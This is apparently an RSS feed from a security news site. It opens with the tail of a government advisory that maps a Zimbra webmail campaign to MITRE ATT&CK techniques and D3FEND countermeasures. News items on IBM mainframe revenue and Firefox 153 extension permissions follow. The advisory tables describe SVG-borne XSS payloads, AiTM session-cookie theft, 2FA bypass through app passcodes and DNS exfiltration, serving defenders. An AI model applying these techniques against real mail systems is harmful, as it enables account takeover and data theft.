</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Command Obfuscation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank"><u>T1027.010</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Encrypted/Encoded File </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank"><u>T1027.013</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: SVG Smuggling </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank"><u>T1027.017</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload was contained in an “onload” attribute within an SVG image included in the malicious email. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Use Alternate Authentication Material: Web Session Cookie </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank"><u>T1550.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 16: Credential Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Adversary-in-the-Middle </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank"><u>T1557</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 17: Collection </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Data Staged: Remote Data Staging </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank"><u>T1074.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Despite tough quarter, IBM says mainframe will continue to put the Big in Big Blue]]></title>
<description><![CDATA[Revenue from IBM’s z mainframe portfolio declined 42% in the quarter ended June 30, dragging infrastructure revenue down 7% compared to the year-ago quarter. But Big Blue executives remain positive on the mainframe’s role as an important AI platform.



After warning of an earnings shortfall, IBM...]]></description>
<link>https://tsecurity.de/de/3689349/it-security-nachrichten/despite-tough-quarter-ibm-says-mainframe-will-continue-to-put-the-big-in-big-blue/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689349/it-security-nachrichten/despite-tough-quarter-ibm-says-mainframe-will-continue-to-put-the-big-in-big-blue/</guid>
<pubDate>Thu, 23 Jul 2026 16:27:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Revenue from IBM’s z mainframe portfolio declined 42% in the quarter ended June 30, dragging infrastructure revenue down 7% compared to the year-ago quarter. But Big Blue executives remain positive on the mainframe’s role as an important AI platform.</p>



<p class="wp-block-paragraph">After warning of an earnings shortfall, IBM lowered its full-year forecast. It now expects 2026 revenue to grow between 4% and 5%, rather than its previous forecast of more than 5% growth. Some parts of its business did well: <a href="https://78449.themediaframe.com/incomm/ibm/ibm260722pressrelease.pdf">Software revenue grew 5% in the second quarter</a> to $7.76 billion, fueled by 11% growth in hybrid cloud, 18% growth in data, and 3% growth in automation.</p>



<p class="wp-block-paragraph">On the infrastructure side, IBM posted second-quarter revenue of $3.8 billion, which is down 7%. Within that business, distributed infrastructure grew 37%, but those gains were offset by a 10% decline in hybrid infrastructure and IBM Z’s 42% drop.</p>



<p class="wp-block-paragraph">In a <a href="https://newsroom.ibm.com/2026-07-14-Arvind-Krishnas-Letter-to-IBM-Investors">July 14 letter</a> to investors released prior to IBM’s July 22 earnings call, CEO Arvind Krishna warned of the earnings shortfall and laid out current challenges. He related the infrastructure performance shortfall to “wrapping on the launch of z17 in the second quarter” and stated: “Given this was the strongest start to a mainframe program in our history, we expected Infrastructure revenue to decline low-single digits for the year, beginning this quarter. What played out was worse than our expectations, driven by a shortfall in our Z performance and the associated software stack, primarily in Transaction Processing.”</p>



<p class="wp-block-paragraph">In the last few weeks of June, customers shifted capex spending and started purchasing more AI infrastructure components in the form of servers, storage, and memory “to secure supply-constrained infrastructure ahead of expected price increases,” Krishna stated. “This dynamic impacted client buying patterns. While we anticipated some supply chain related impact in our expectations, we did not anticipate the magnitude of the capex reprioritization.”</p>



<p class="wp-block-paragraph">Yet despite challenges this last quarter, z17 remains at nearly 130% growth program-to-program, according to IBM. That’s “well ahead of z16, which was our strongest program on record, with clients representing 85% of installed MIPs maintaining or growing capacity,” the July 14 letter stated.</p>



<p class="wp-block-paragraph">Mainframe infrastructure momentum is expected to continue, and IBM is anticipating strong workload growth and <a href="https://www.networkworld.com/article/3845376/ibm-laying-foundation-for-mainframe-as-ultimate-ai-server.html">AI-driven capacity</a> expansion as clients modernize mission-critical systems and emphasize resiliency and security, Krishna said during the company’s Q2 2026 earnings call on July 22.</p>



<p class="wp-block-paragraph">“AI is driving incremental capacity growth and new workloads as clients look to run AI closer to their most sensitive data,” IBM senior vice president and CFO James Kavanaugh said in the call. “We are seeing strong early adoption of our AI innovations with nearly 50% of <a href="https://www.networkworld.com/article/4193914/ibm-grows-mainframe-family-with-rack-frame-models-targeting-ai-hybrid-clouds.html">z17 customers</a> investing in AI capabilities with Spyre AI accelerator, and clients deploying Watson X Code Assistant for Z are growing MIPS capacity three times faster than those who are not.”</p>



<p class="wp-block-paragraph">“In a world where infrastructure costs are rising and efficiency matters more than ever, IBM Z offers a compelling economic advantage,” Kavanaugh continued. “Depending on the size and complexity of workloads, clients can realize a 2 to 15x total cost of ownership benefit versus moving these workloads off the platform, reinforcing why the platform remains central to their operations and positioning us to capture additional value as AI workloads grow.”</p>



<p class="wp-block-paragraph">“We see no evidence of clients moving off mainframe,” Kavanaugh added. “Clients continue to invest in IBM Z to modernize mission-critical workloads with a focus on resiliency and security.”</p>



<p class="wp-block-paragraph">In responding to an analyst question, Kavanaugh said three key things drive mainframe demand and purchasing requirements:</p>



<p class="wp-block-paragraph">“One is capacity workload. It’s the most important determinant. 85% Of the installed MIPS capacity out there in the marketplace today running all those core mission critical workloads are either stable or growing. Clients are adding capacity and workload to mainframe, the viability. And by the way, that’s coming in new AI workloads, analytics workloads, Linux-based workloads, and those MIPS are growing program to date over 15 to 20% installed capacity,” Kavanaugh said.</p>



<p class="wp-block-paragraph">Number 2 is economic factors. “We don’t talk a lot about this, but I think it’s important for our investors to understand things like total cost of ownership. Depending on the size and complexity of the workload, we have anywhere from a 2 to a 15x TCO advantage running on the mainframe [over smaller server systems]. Again, we do not see any evidence of clients migrating off mainframe and lease propensity, which is a great indicator,” Kavanaugh said.</p>



<p class="wp-block-paragraph">The third driver is AI. “When you look at it, applications, data security, all on the platform, we do 450 billion inferences per day at 1 millisecond with 8 nines availability,” Kavanaugh said. “We’ve got clients that have already purchased over 50% of our Spire inferencing, and those clients that have purchased that are growing MIPS capacity, the way [we monetize value], by over three times faster than others.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Addons Blog: Firefox 153 WebExtensions API updates]]></title>
<description><![CDATA[We had a bumper release of WebExtensions API updates in Firefox 153. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: userScripts.execute() and the new publicSuffix API. We’re covering those con...]]></description>
<link>https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</guid>
<pubDate>Thu, 23 Jul 2026 16:06:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We had a bumper release of <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">WebExtensions API updates in Firefox 153</a>. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: <span>userScripts.execute()</span> and the new <span>publicSuffix</span> API. We’re covering those contributions in more depth, including the people behind them, in a separate post. And there is more, read on…</p>
<h3><b>File access now requires a dedicated permission</b></h3>
<p>Extensions that need to read <span>file://</span> URLs used to get that access as part of the “Access your data for all websites” host permission. Starting in Firefox 153, file access is a separate, explicit permission, “Access local files on your computer”, shown in the extension’s permissions settings. It’s off by default for every extension, including ones already installed.</p>
<p>This change has a few concrete effects on code:</p>
<ul>
<li><b>Before:</b> an extension with <span>&lt;all_urls&gt;</span> or a matching host permission could read <span>file://</span> pages without any additional grant, and <span>extension.isAllowedFileSchemeAccess()</span> always returned <span>false</span> regardless of the permission setting.</li>
<li><b>After:</b> the extension must have the new file-access permission granted, and <span>extension.isAllowedFileSchemeAccess()</span> correctly reflects whether the user has granted it.</li>
</ul>
<pre>async function checkFileSchemeAccess() {
  const isAllowed = await browser.extension.isAllowedFileSchemeAccess();

  if (!isAllowed) {
    await browser.notifications.create("file-scheme-access-needed", {
      type: "basic",
      iconUrl: browser.runtime.getURL("icons/icon-48.png"),
      title: "Local file access required",
      message:
        'This extension needs "Allow access to file URLs" enabled to work ' +
        "with local files. Go to about:addons → select this extension → " +
